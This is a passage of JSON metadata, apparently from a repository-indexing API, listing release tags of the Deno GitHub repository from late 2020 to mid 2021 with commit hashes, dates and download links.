gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.